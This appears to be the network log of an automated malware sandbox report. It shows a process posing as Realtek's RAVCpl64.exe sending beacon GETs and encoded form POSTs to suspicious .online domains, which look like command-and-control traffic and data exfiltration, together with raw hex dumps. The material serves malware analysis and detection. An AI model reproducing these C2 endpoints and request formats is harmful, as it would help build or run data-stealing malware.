                                                                                  Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef [TRUNCATED]
                                                                                  Data Ascii: 1359ZrHr?OAa{7j$A$@$Hn85d.PRbKpD#+/3+~{'vU5o]~&neU~ycr:~z{YnTW=y)~}W>]- f>5YQ]MkCmea}i~NF @4S~|VeYbwE]vYg<{L0[ePiy_Eeexv(w0u7%0r8Fl~e_2Y0gO{8#rq'f~U_Y7p2M+`=L]hf/}"x+@d{^v#^K{jyYU]8j?DkYzlxg&Se^}UZ>Rx&#?_|A:6+)o92?I7d#8''@[YUeM^_WXBGWxGV^5\Y}q+|g|qW&0jDLFo^19_G5m{Z^b1/Vz 2xc7+w7;<[^G;\,ml[z7/hK901[3~{Yr@K~y?@q/I:d9oj0}^/5FF7?u`}s9C <.#ku~^OH_3ymnQ{3+/Kz [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:39.113279104 CET1289INData Raw: 01 ff 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab fc 74 41 f6 b3 5f bf 9f f7 c6 7e bf e2 96 b5 0f b3 48 3f f1 bb 57 fc 18 e5 6f 28 5e 22 e9 07 87 a2 9e ca 8b 96 26 b7 e7 82 1b 12 bf ee e5 57 44 df 7b 7a 3f d0 b7 6b d4 fe e8 71 bf be ef 83 17 16 20
                                                                                  Data Ascii: iA8nR?tA_~H?Wo(^"&WD{z?kq \A;g?T=P{?B`x!YkaQ7zl~sVusGo^EBnngALjQ2.aS/Y#
                                                                                  Dec 4, 2024 17:11:39.113286972 CET1289INData Raw: 32 b5 4d c6 96 12 a8 63 fb 6c 0e 39 86 57 f9 dc 1f ad d3 c3 39 d9 d2 96 3e ae b8 2e 0a 36 2d 3e 3a 9d 71 81 49 90 23 d7 70 fb 09 33 6e 58 63 ef 6e 29 35 48 e7 91 aa f3 70 38 96 d9 94 59 c0 41 6b 35 b3 62 94 84 ca 5c 58 9b 4b 6e 48 74 39 cd 17 31
                                                                                  Data Ascii: 2Mcl9W9>.6->:qI#p3nXcn)5Hp8YAk5b\XKnHt91"PSN\F^9q-/ej"/!A)VE5V#jKm;cKW,H rClJX\NrmJ&fO|V6]`A1U<5gO;"J><C&'6pAn%
                                                                                  Dec 4, 2024 17:11:39.113308907 CET1289INData Raw: ae bd f5 22 2e 71 18 ca 0d fc da ad d7 89 5c 41 65 10 69 ee dc c1 9b d1 38 55 26 b6 cc ce 84 26 63 21 a8 73 9a 3c 03 c7 3b 26 1f ae bc 8c ef 84 f2 80 9c a6 80 07 41 af cb 71 99 6c 02 52 14 36 bc d8 ce aa c5 69 5c cb 23 c5 85 5b 2a 2d e8 6e 99 52
                                                                                  Data Ascii: ".q\Aei8U&&c!s<;&AqlR6i\#[*-nRI\-J=?i1%<)cZ/vV!K,M.YzQLsSM5ut4vl4!.U`7[vMmn5f<oW7
                                                                                  Dec 4, 2024 17:11:39.113316059 CET74INData Raw: f5 cf 80 f9 5e 67 2f 45 c5 bb 6f cc f7 fa e2 7f ff 17 a8 00 a1 a3 c1 35 b5 0f 4c f6 6c 36 f3 c6 20 ef f1 f5 08 5f 5b ed 11 7e ce 5f 8f 97 67 72 df 7e fb 1f 00 00 00 ff ff 03 00 a3 72 38 d7 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ^g/Eo5Ll6 _[~_gr~r8'0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.11.204972266.29.132.194807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:41.607650042 CET493OUTGET /k6yn/?h7i-=tZtx&IUY=tNpa1p20+8HvGGTFO8FkkeyNbaBnDGg9aQgmgnvjgQBap2YCvQVXfu0lL5fLGicbWcSejDEnKeIqzsVAbPYV9SmH+8E676AUWIvi1rNZuDh4+Pmog8xR0m4= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:11:41.810597897 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  date: Wed, 04 Dec 2024 16:11:41 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                  Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:41.810607910 CET1289INData Raw: 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74
                                                                                  Data Ascii: 0%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                                                  Dec 4, 2024 17:11:41.810858965 CET1289INData Raw: 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30
                                                                                  Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0;
                                                                                  Dec 4, 2024 17:11:41.810869932 CET1289INData Raw: 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: : 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; }
                                                                                  Dec 4, 2024 17:11:41.817557096 CET1289INData Raw: 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f
                                                                                  Data Ascii: fRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4
                                                                                  Dec 4, 2024 17:11:41.817598104 CET1289INData Raw: 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 4f 4e 74 45 55 4b 58 47 43 39 35 6a 4b 2b 52 67 34 51 42 56 77 4e 6d 6c 65 50 5a 56 6a 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f
                                                                                  Data Ascii: 7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQ
                                                                                  Dec 4, 2024 17:11:41.817620993 CET1289INData Raw: 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 49 2f 64 63 2f 42 36 4e 2f 4d 39 57 73 69 41 44 4f 30 30 41 33 51 55 30 68 6f 68 58 35 52 54 64 65 43 72 73 74 79 54 31 57 70 68 55 52 54
                                                                                  Data Ascii: api44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr27
                                                                                  Dec 4, 2024 17:11:41.817914963 CET1289INData Raw: 6e 6c 69 6e 65 2f 63 70 5f 65 72 72 6f 72 64 6f 63 75 6d 65 6e 74 2e 73 68 74 6d 6c 20 70 6f 72 74 20 38 30 20 6f 6e 20 57 65 64 6e 65 73 64 61 79 2c 20 30 34 2d 44 65 63 2d 32 30 32 34 20 31 31 3a 31 31 3a 34 31 20 45 53 54 22 3e 20 57 65 62 4d
                                                                                  Data Ascii: nline/cp_errordocument.shtml port 80 on Wednesday, 04-Dec-2024 11:11:41 EST"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="addit
                                                                                  Dec 4, 2024 17:11:41.817939997 CET34INData Raw: 6f 6f 74 65 72 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ooter> </body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.11.2049723202.92.5.23807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:47.889233112 CET760OUTPOST /cboa/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Origin: http://www.thaor56.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.thaor56.online/cboa/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 39 33 30 71 66 4f 52 33 2f 31 32 6a 49 64 73 4a 63 39 50 64 4b 54 5a 57 46 30 62 30 70 50 67 37 45 6f 4f 30 48 6d 70 32 72 2b 46 63 58 7a 64 69 45 43 4e 7a 32 4a 69 56 67 64 4b 4d 56 57 48 41 4c 6b 72 57 57 43 55 48 30 66 37 6c 47 72 41 50 61 57 63 4e 4e 7a 48 56 51 55 7a 53 6d 46 42 35 38 59 6b 33 4b 70 41 35 51 51 63 4e 5a 45 6e 71 35 2b 6b 6b 74 57 63 4a 4d 78 44 6e 30 48 7a 6e 46 4e 62 59 74 62 6a 7a 58 4b 30 61 39 42 75 70 31 4c 4a 5a 32 5a 64 66 6b 4c 58 6e 63 61 44 50 6c 45 31 45 33 6c 6c 62 74 6e 77 35 63 68 72 70 38 76 75 44 51 3d 3d
                                                                                  Data Ascii: IUY=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJZ2ZdfkLXncaDPlE1E3llbtnw5chrp8vuDQ==
                                                                                  Dec 4, 2024 17:11:48.259759903 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:11:48 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:48.259768009 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.11.2049724202.92.5.23807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:50.792583942 CET780OUTPOST /cboa/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Origin: http://www.thaor56.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.thaor56.online/cboa/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 72 67 38 68 55 4f 37 6c 65 70 78 72 2b 46 49 48 7a 63 68 30 43 57 7a 32 45 64 56 6c 64 4b 4d 56 43 48 41 4a 38 72 58 6c 71 58 45 45 66 35 77 57 72 43 42 36 57 63 4e 4e 7a 48 56 51 41 5a 53 6d 4e 42 34 4d 49 6b 34 4c 70 66 6c 67 51 66 45 35 45 6e 75 35 2b 6f 6b 74 57 69 4a 4e 74 35 6e 32 50 7a 6e 45 39 62 62 38 62 67 6f 48 4b 75 55 64 42 2f 36 33 37 4d 58 6d 56 53 5a 56 54 63 6f 38 47 30 4f 7a 4a 76 5a 46 52 42 59 2b 37 43 39 73 59 44 72 2b 75 31 65 61 75 46 34 46 6c 71 68 33 4c 51 6b 75 2b 74 42 6c 45 65 35 55 4d 3d
                                                                                  Data Ascii: IUY=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+7C9sYDr+u1eauF4Flqh3LQku+tBlEe5UM=
                                                                                  Dec 4, 2024 17:11:51.164731026 CET1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 1251
                                                                                  date: Wed, 04 Dec 2024 16:11:51 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:51.164738894 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                  Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.11.2049725202.92.5.23807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:53.697046995 CET2578OUTPOST /cboa/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.thaor56.online
                                                                                  Origin: http://www.thaor56.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.thaor56.online/cboa/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 6a 67 38 58 67 4f 36 45 65 70 77 72 2b 46 4c 48 7a 52 68 30 44 57 7a 32 63 5a 56 6c 68 30 4d 58 36 48 47 71 30 72 51 55 71 58 66 55 66 35 79 57 72 42 50 61 58 42 4e 4a 58 44 56 51 51 5a 53 6d 4e 42 34 4b 4d 6b 78 36 70 66 32 77 51 63 4e 5a 46 6f 71 35 2f 42 6b 74 50 5a 4a 4e 59 62 6e 6e 76 7a 6e 6b 74 62 55 75 44 67 31 58 4b 6f 58 64 41 69 36 33 32 63 58 69 38 70 5a 56 57 4c 6f 38 2b 30 4b 6e 49 32 4f 6b 42 33 50 65 36 50 69 34 4d 68 6c 73 79 58 44 59 57 4e 2f 6b 6c 41 69 68 48 64 6f 4f 47 2f 61 6b 4d 49 37 55 70 74 4a 51 6d 79 76 32 38 46 6f 55 30 4e 50 39 70 46 33 39 4b 59 6a 79 41 36 77 42 37 61 6d 68 75 54 31 37 6c 6c 4d 56 58 5a 34 41 41 43 54 30 68 6b 41 6f 47 47 46 65 35 41 50 54 7a 35 76 47 76 4d 71 46 37 4c 7a 57 31 76 53 46 46 70 47 39 33 32 76 5a 70 6c 56 49 72 36 2b 77 62 6d 43 4d 59 4f 77 6c 55 43 64 4c 50 4f 58 31 48 71 78 6c 51 6a 67 71 75 58 73 63 [TRUNCATED]
